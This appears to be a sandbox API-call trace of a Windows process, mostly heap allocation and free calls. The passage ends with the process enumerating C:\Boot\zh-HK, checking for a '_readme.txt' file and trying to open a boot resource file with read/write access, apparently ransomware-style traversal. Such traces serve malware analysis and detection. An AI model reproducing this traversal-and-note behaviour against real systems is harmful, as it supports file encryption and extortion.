[0058.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.281] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.282] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.282] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.282] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.282] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.282] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.282] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.282] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.282] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.282] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.282] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.282] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.282] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.282] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.282] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.282] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.282] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.282] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.283] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.283] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.283] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.283] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.283] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.283] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.283] PathFindFileNameW (pszPath="C:\\Boot\\zh-HK\\") returned="zh-HK\\" [0058.283] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ed88 [0058.283] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.283] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0058.283] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ed88 | out: hHeap=0x660000) returned 1 [0058.283] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0058.283] PathFindFileNameW (pszPath="") returned="" [0058.283] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ed88 [0058.283] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0058.283] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0058.283] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x800) returned 0x3268798 [0058.283] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3268798 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0058.283] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c5da58 [0058.283] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.283] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.283] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.284] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ed88 | out: hHeap=0x660000) returned 1 [0058.284] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0058.284] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.284] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.284] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.284] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.284] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x81c) returned 0x9c5da58 [0058.284] PathAppendW (in: pszPath="C:\\Boot\\zh-HK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 1 [0058.284] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.284] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.284] PathFileExistsW (pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 1 [0058.284] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.284] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.284] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ecc2910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ecc2910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0058.284] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.284] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ecc2910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ecc2910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.284] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0058.284] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.284] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216680 [0058.284] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.284] PathFindExtensionW (pszPath="C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned=".mui" [0058.284] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.284] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216680 | out: hHeap=0x660000) returned 1 [0058.284] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ecc2910, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ecc2910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ecc2910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0058.285] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.285] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216680 [0058.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.285] PathFindExtensionW (pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned=".txt" [0058.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216680 | out: hHeap=0x660000) returned 1 [0058.285] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ecc2910, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ecc2910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ecc2910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0058.285] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0058.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e950 | out: hHeap=0x660000) returned 1 [0058.285] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.285] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e950 [0058.285] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.285] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.285] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.285] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.285] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.285] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.285] RtlAllocateHeap (HeapHandle=0x660000, 